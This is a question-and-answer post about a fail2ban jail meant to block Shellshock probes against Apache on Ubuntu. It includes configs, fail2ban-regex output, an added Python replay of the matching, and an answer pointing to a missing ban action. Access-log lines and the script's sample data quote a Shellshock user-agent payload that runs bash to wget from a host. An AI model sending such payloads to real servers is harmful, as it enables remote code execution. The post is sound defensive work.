fail2ban rule does not take effect

I installed the Apache web server on a stock install of Ubuntu 14.04, and I am trying to use fail2ban to block requests that probe for vulnerabilities.

I put the following in /etc/fail2ban/jail.local:

    [apache-vulnerability-scan]
    enabled  = true
    port     = http,https
    filter   = apache-vulnerability-scan
    logpath  = /var/log/apache*/*access.log
    maxretry = 1

The rule is defined in /etc/fail2ban/filter.d/apache-vulnerability-scan.conf:

    [Definition]
    failregex = ^<HOST> -.*"\(\)\s*\{[^;"]+[^}"]+}\s*;.*$
    ignoreregex =

For those who may not be familiar with the fail2ban defaults on Ubuntu, some of the main settings are as follows:

    ignoreip = 127.0.0.1/8
    bantime  = 600
    findtime = 600
    maxretry = 3
    backend  = auto
    usedns   = warn
    protocol = tcp
    chain    = INPUT

However, even with maxretry set to 1, I am able to keep making requests without my IP being banned.

    10.0.2.2 - - [21/Nov/2015:00:11:40 +0530] "GET /cgi-bin/ HTTP/1.1" 500 798 "-" "() { :; }; /bin/bash -c \"cd /tmp; wget http://10.0.2.2/\""
    10.0.2.2 - - [21/Nov/2015:00:11:40 +0530] "GET /cgi-bin/ HTTP/1.1" 500 798 "-" "() { :; }; /bin/bash -c \"cd /tmp; wget http://10.0.2.2/\""
    10.0.2.2 - - [21/Nov/2015:00:11:40 +0530] "GET /cgi-bin/ HTTP/1.1" 500 798 "-" "() { :; }; /bin/bash -c \"cd /tmp; wget http://10.0.2.2/\""
    10.0.2.2 - - [21/Nov/2015:00:11:41 +0530] "GET /cgi-bin/ HTTP/1.1" 500 798 "-" "() { :; }; /bin/bash -c \"cd /tmp; wget http://10.0.2.2/\""
    10.0.2.2 - - [21/Nov/2015:00:11:41 +0530] "GET /cgi-bin/ HTTP/1.1" 500 798 "-" "() { :; }; /bin/bash -c \"cd /tmp; wget http://10.0.2.2/\""
    10.0.2.2 - - [21/Nov/2015:00:11:41 +0530] "GET /cgi-bin/ HTTP/1.1" 500 798 "-" "() { :; }; /bin/bash -c \"cd /tmp; wget http://10.0.2.2/\""
    10.0.2.2 - - [21/Nov/2015:00:11:41 +0530] "GET /cgi-bin/ HTTP/1.1" 500 798 "-" "() { :; }; /bin/bash -c \"cd /tmp; wget http://10.0.2.2/\""
    10.0.2.2 - - [21/Nov/2015:00:11:42 +0530] "GET /cgi-bin/ HTTP/1.1" 500 798 "-" "() { :; }; /bin/bash -c \"cd /tmp; wget http://10.0.2.2/\""
    10.0.2.2 - - [21/Nov/2015:00:11:42 +0530] "GET /cgi-bin/ HTTP/1.1" 500 798 "-" "() { :; }; /bin/bash -c \"cd /tmp; wget http://10.0.2.2/\""
    10.0.2.2 - - [21/Nov/2015:00:11:43 +0530] "GET /cgi-bin/ HTTP/1.1" 500 798 "-" "() { :; }; /bin/bash -c \"cd /tmp; wget http://10.0.2.2/\""
    10.0.2.2 - - [21/Nov/2015:00:11:50 +0530] "GET / HTTP/1.1" 200 11820 "-" "Wget/1.16.3 (msys)"

The status of the filter looks fine:

    # fail2ban-client status apache-vulnerability-scan
    Status for the jail: apache-vulnerability-scan
    |- filter
    |  |- File list:        /var/log/apache2/other_vhosts_access.log /var/log/apache2/access.log
    |  |- Currently failed: 0
    |  `- Total failed:     0
    `- action
       |- Currently banned: 0
       |  `- IP list:
       `- Total banned:     0

And so does the rule itself:

    Running tests
    =============

    Use failregex file : /etc/fail2ban/filter.d/apache-vulnerability-scan.conf
    Use log file       : /var/log/apache2/access.log

    Results
    =======

    Failregex: 10 total
    |-  #) [# of hits] regular expression
    |   1) [10] ^<HOST> -.*"\(\)\s*\{[^;"]+[^}"]+}\s*;.*$
    |   10.0.2.2  Sat Nov 21 00:11:40 2015
    |   10.0.2.2  Sat Nov 21 00:11:40 2015
    |   10.0.2.2  Sat Nov 21 00:11:40 2015
    |   10.0.2.2  Sat Nov 21 00:11:41 2015
    |   10.0.2.2  Sat Nov 21 00:11:41 2015
    |   10.0.2.2  Sat Nov 21 00:11:41 2015
    |   10.0.2.2  Sat Nov 21 00:11:41 2015
    |   10.0.2.2  Sat Nov 21 00:11:42 2015
    |   10.0.2.2  Sat Nov 21 00:11:42 2015
    |   10.0.2.2  Sat Nov 21 00:11:43 2015
    `-

    Ignoreregex: 0 total

    Date template hits:
    |- [# of hits] date format
    |  [13] Day/MONTH/Year:Hour:Minute:Second
    |  [0] WEEKDAY MONTH Day Hour:Minute:Second[.subsecond] Year
    |  [0] WEEKDAY MONTH Day Hour:Minute:Second Year
    |  [0] WEEKDAY MONTH Day Hour:Minute:Second
    |  [0] MONTH Day Hour:Minute:Second
    |  [0] Year/Month/Day Hour:Minute:Second
    |  [0] Day/Month/Year Hour:Minute:Second
    |  [0] Day/Month/Year2 Hour:Minute:Second
    |  [0] Month/Day/Year:Hour:Minute:Second
    |  [0] Year-Month-Day Hour:Minute:Second[,subsecond]
    |  [0] Year-Month-Day Hour:Minute:Second
    |  [0] Year.Month.Day Hour:Minute:Second
    |  [0] Day-MONTH-Year Hour:Minute:Second[.Millisecond]
    |  [0] Day-Month-Year Hour:Minute:Second
    |  [0] Month-Day-Year Hour:Minute:Second[.Millisecond]
    |  [0] TAI64N
    |  [0] Epoch
    |  [0] ISO 8601
    |  [0] Hour:Minute:Second
    |  [0] <Month/Day/Year@Hour:Minute:Second>
    |  [0] YearMonthDay Hour:Minute:Second
    |  [0] Month-Day-Year Hour:Minute:Second
    `-

    Lines: 13 lines, 0 ignored, 12 matched, 1 missed
    |- Missed line(s):
    |  10.0.2.2 - - [21/Nov/2015:00:11:50 +0530] "GET / HTTP/1.1" 200 11820 "-" "Wget/1.16.3 (msys)"
    `-

Why does the fail2ban rule not take effect? What am I doing wrong here?
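To see what the question's failregex and the maxretry/findtime counters would do on these access-log lines without a fail2ban install, here is an added Python replay of the matching (not fail2ban's own code: the <HOST> expansion is a simplified IPv4-only stand-in, and the log lines are constructed from the ones in the question):

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Simplified IPv4-only stand-in for the pattern fail2ban substitutes for <HOST>
# (assumption: fail2ban's real expansion also covers hostnames and IPv6).
HOST_RE = r"(?P<host>\d{1,3}(?:\.\d{1,3}){3})"
# The failregex from the question's filter, unchanged.
FAILREGEX = r'^<HOST> -.*"\(\)\s*\{[^;"]+[^}"]+}\s*;.*$'
DATE_RE = re.compile(r"\[(\d{2}/\w{3}/\d{4}:\d{2}:\d{2}:\d{2}) [+-]\d{4}\]")

def access_line(clock, request, status, size, agent):
    """Build one Apache combined-log line (constructed sample data)."""
    return f'10.0.2.2 - - [21/Nov/2015:{clock} +0530] "{request}" {status} {size} "-" {agent}'

# Ten probe lines carrying the function-definition user agent from the question,
# followed by the benign Wget request that fail2ban-regex reported as missed.
PROBE_UA = r'"() { :; }; /bin/bash -c \"cd /tmp; wget http://10.0.2.2/\""'
PROBE_TIMES = ["00:11:40"] * 3 + ["00:11:41"] * 4 + ["00:11:42"] * 2 + ["00:11:43"]
SAMPLE_LOG = [access_line(t, "GET /cgi-bin/ HTTP/1.1", 500, 798, PROBE_UA) for t in PROBE_TIMES]
SAMPLE_LOG.append(access_line("00:11:50", "GET / HTTP/1.1", 200, 11820, '"Wget/1.16.3 (msys)"'))

def compile_failregex(failregex):
    """Expand <HOST> into a named group, as fail2ban-regex does before matching."""
    return re.compile(failregex.replace("<HOST>", HOST_RE))

def scan(lines, failregex, maxretry, findtime):
    """Replay fail2ban's counting: a host is banned once it has maxretry matched
    lines inside a sliding findtime window. Returns (hits, missed, banned)."""
    pattern = compile_failregex(failregex)
    hits, missed, banned = [], [], {}
    recent = defaultdict(list)
    for line in lines:
        m = pattern.search(line)
        if not m:
            missed.append(line)
            continue
        host = m.group("host")
        ts = datetime.strptime(DATE_RE.search(line).group(1), "%d/%b/%Y:%H:%M:%S")
        hits.append((host, ts))
        if host in banned:
            continue  # already banned, nothing more to count
        window = [t for t in recent[host] if ts - t <= timedelta(seconds=findtime)]
        window.append(ts)
        recent[host] = window
        if len(window) >= maxretry:
            banned[host] = ts  # the moment fail2ban would fire the jail's action
    return hits, missed, banned

if __name__ == "__main__":
    hits, missed, banned = scan(SAMPLE_LOG, FAILREGEX, maxretry=1, findtime=600)
    print(f"{len(hits)} matched, {len(missed)} missed, would ban: {banned}")
```

With maxretry=1 the first probe line already produces a ban decision, which matches the 10 hits fail2ban-regex reported; whether anything actually gets blocked then depends on the jail's action, which this replay does not model.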

For the rule you are using, you are missing an action, which means fail2ban does not know what to do when the rule matches. This can be configured either globally or locally per jail. The action rules live in /etc/fail2ban/action.d/

For example, for a global action you can add the following to jail.local:

    banaction = iptables-multiport

Please check the "Actions" section of your jail.conf file for more details.

Since iptables chain names have a limited length, you will also need to shorten the jail name apache-vulnerability-scan.